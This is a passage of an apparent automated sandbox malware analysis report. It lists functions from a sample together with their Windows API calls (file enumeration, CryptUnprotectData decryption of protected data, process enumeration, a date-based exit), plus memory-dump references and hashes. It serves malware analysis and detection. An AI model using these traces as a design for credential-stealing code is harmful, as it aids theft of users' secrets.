                              • StrCmpCA.SHLWAPI(?,006A14FC), ref: 0068E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0068EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 7c2d8164f1e3646397350be9fc020df652dd3dfb62b6a361584a29807186697b
                              • Instruction ID: 2fba8e828b47acdb7e91d66067ae83d586f60ead7cb5997f52da0cab807e79d6
                              • Opcode Fuzzy Hash: 7c2d8164f1e3646397350be9fc020df652dd3dfb62b6a361584a29807186697b
                              • Instruction Fuzzy Hash: 38123F719201189ADF58FBA0DD96EED73BEAF54300F4041ACB50A96491EE306F49CFD6
                              Function 00689AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00684EEE,00000000,?), ref: 00689B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689B2A
                              • LocalFree.KERNEL32(?,?,?,?,00684EEE,00000000,?), ref: 00689B3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID: Nh
                              • API String ID: 4291131564-3382845309
                              • Opcode ID: 8335f3246915526a25bdfcc5ab385d56df2e52546049395a429bd0e8e5141240
                              • Instruction ID: 20b5681b6eb2cf211115ae8ff58317b9971f37c4ba18c10548f730eae0796ea6
                              • Opcode Fuzzy Hash: 8335f3246915526a25bdfcc5ab385d56df2e52546049395a429bd0e8e5141240
                              • Instruction Fuzzy Hash: 0111A2B4241208AFEB14CF64DC95FAA77B5FB89704F208158F9159B390C7B6A901CBA4
                              Function 00A3EF59 Relevance: 7.9, Strings: 5, Instructions: 1626COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: LW'T$Z'$r2z:$M|w$h[j
                              • API String ID: 0-3466229688
                              • Opcode ID: 49a109f058f6471ac4167a8a2b6056d8a9ea06fee78802d7dc668954072b547c
                              • Instruction ID: e87c5b890f064deb97ac2e6ce0f3997abddcd97b93038e682e417136110ac6f9
                              • Opcode Fuzzy Hash: 49a109f058f6471ac4167a8a2b6056d8a9ea06fee78802d7dc668954072b547c
                              • Instruction Fuzzy Hash: BEA23AF3A0C204AFE3046E2DEC8567AFBE9EBD4320F16463DE6C4C7744E97598058696
                              Function 00A48E64 Relevance: 7.8, Strings: 5, Instructions: 1585COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 3{=w$7nN}$>+o}$FjB]$k>
                              • API String ID: 0-4205327788
                              • Opcode ID: 16927b41ad9bd6cf3632e4595f604d5402c0f80ef89d7b62d2958003487fb2a7
                              • Instruction ID: 6da22eb02c71b11e738bcb9847938ffe7cf8dd44a51cea255ff746d4bd809d44
                              • Opcode Fuzzy Hash: 16927b41ad9bd6cf3632e4595f604d5402c0f80ef89d7b62d2958003487fb2a7
                              • Instruction Fuzzy Hash: 06A248F3A0C2109FE7086E2DEC9577ABBE9EF94320F1A453DEAC4C3744E93558058692
                              Function 0068C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0068C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0068C87C
                              • lstrcat.KERNEL32(?,006A0B46), ref: 0068C943
                              • lstrcat.KERNEL32(?,006A0B47), ref: 0068C957
                              • lstrcat.KERNEL32(?,006A0B4E), ref: 0068C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 20558dc6898a37cefa862cd48c61fc22ce3c54149e4243d92dfb107c19d2db8f
                              • Instruction ID: 137f77f300778fae0aadde817a784046739778a46020b289a42af0b33387a5a2
                              • Opcode Fuzzy Hash: 20558dc6898a37cefa862cd48c61fc22ce3c54149e4243d92dfb107c19d2db8f
                              • Instruction Fuzzy Hash: E64180B590421EDFDB10DFA4DD89FEEB7B9BB48308F1041A8F509A6280D7715A84CFA1
                              Function 00696920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0069696C
                              • sscanf.NTDLL ref: 00696999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006969B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006969C0
                              • ExitProcess.KERNEL32 ref: 006969DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: dd8fd08e3bf29036c86b7a3cbee9ae25bf2f6a0e0d4030cef12e5d069409d944
                              • Instruction ID: 6e7cda5d7d101a214a419c072a7557b4499b51ecd7e3ef928c82740d747543b4
                              • Opcode Fuzzy Hash: dd8fd08e3bf29036c86b7a3cbee9ae25bf2f6a0e0d4030cef12e5d069409d944
                              • Instruction Fuzzy Hash: 4821BA75D1420DABCF48EFE4D9459EEB7BAFF48304F04852EE506A3250EB345605CBA9
                              Function 00687240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0068724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00687254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00687281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006872A4
                              • LocalFree.KERNEL32(?), ref: 006872AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 6a4ab68042aaa7825253038fee844226ae2245f9a360a63c96b0e3efb9eeccd1
                              • Instruction ID: 56d658aa4a35a7408f40a0609756564fb7da6a1a03bdcf720c634ddbb690308a
                              • Opcode Fuzzy Hash: 6a4ab68042aaa7825253038fee844226ae2245f9a360a63c96b0e3efb9eeccd1
                              • Instruction Fuzzy Hash: 9B010CB5A40208BBEB14DFE4DD4AF9E77B9FB44B05F204155FB05AA2C0D6B0AA018B65
                              Function 00699600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0069961E
                              • Process32First.KERNEL32(006A0ACA,00000128), ref: 00699632
                              • Process32Next.KERNEL32(006A0ACA,00000128), ref: 00699647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0069965C
                              • CloseHandle.KERNEL32(006A0ACA), ref: 0069967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: d68793b03f40fa8bb2079b1683165a3639ffc8012501d23cbe74ba3a6d2d1baa
                              • Instruction ID: 4cf59cf971173e686d2d67d1e44692b91e5d194c06c9cac1f3c7731fda5348cc
                              • Opcode Fuzzy Hash: d68793b03f40fa8bb2079b1683165a3639ffc8012501d23cbe74ba3a6d2d1baa
                              • Instruction Fuzzy Hash: B7010C75A00208EBDF14DFA5DD48FEDBBF9FB48704F104198A905A6240D7349B41CF61
                              Function 00A4C35C Relevance: 6.6, Strings: 4, Instructions: 1574COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2z3w$eC<c$f:o>$m6f
                              • API String ID: 0-1938127671
                              • Opcode ID: f98c1c0fe31fccaf8bddd04f6ab51c48c1e246ee1a1a87ab487378316ceceefe
                              • Instruction ID: 56ca813031df3f6eb1be096d03ffd63deba60e795d0e311d578ba6e5ee714412
                              • Opcode Fuzzy Hash: f98c1c0fe31fccaf8bddd04f6ab51c48c1e246ee1a1a87ab487378316ceceefe
                              • Instruction Fuzzy Hash: 2BB209F3A082049FE7046E2DEC8567AFBE9EF94720F1A493DEAC4C7344E63558158693
                              Function 00A473D4 Relevance: 6.6, Strings: 4, Instructions: 1559COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 1S$=L1w$W(_$w^dT
                              • API String ID: 0-1958092904
                              • Opcode ID: cc11a19fd53b29870007f7be5a495e773e534913b06d1e73d67ab5f57e1cf6fa
                              • Instruction ID: 8c3dec230b6be7c0fd720bcc441e22325030b094e7f8e16b8c6c400935210de3
                              • Opcode Fuzzy Hash: cc11a19fd53b29870007f7be5a495e773e534913b06d1e73d67ab5f57e1cf6fa
                              • Instruction Fuzzy Hash: 4CB2F5F3A082009FE304AE2DDC8567ABBE5EFD8320F16893DEAC4C7744E63558458697
                              Function 00698EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00685184,40000001,00000000,00000000,?,00685184), ref: 00698EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: cb028d8be11d2e1af350f668031803bb51d3a86a47b03597ac6a742e26e0b03b
                              • Instruction ID: 29265f49715db882b24fed8d7ff57a692e0bc4efee2fc3374089146fd189ace9
                              • Opcode Fuzzy Hash: cb028d8be11d2e1af350f668031803bb51d3a86a47b03597ac6a742e26e0b03b
                              • Instruction Fuzzy Hash: 8E110A70200208AFDF04CF64D884FA637BEBF8A354F109458F9158B650DB35E842DB60
                              Function 00697A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0148E458,00000000,?,006A0E10,00000000,?,00000000,00000000), ref: 00697A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00697A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0148E458,00000000,?,006A0E10,00000000,?,00000000,00000000,?), ref: 00697A7D
                              • wsprintfA.USER32 ref: 00697AB7
                              Memory Dump Source
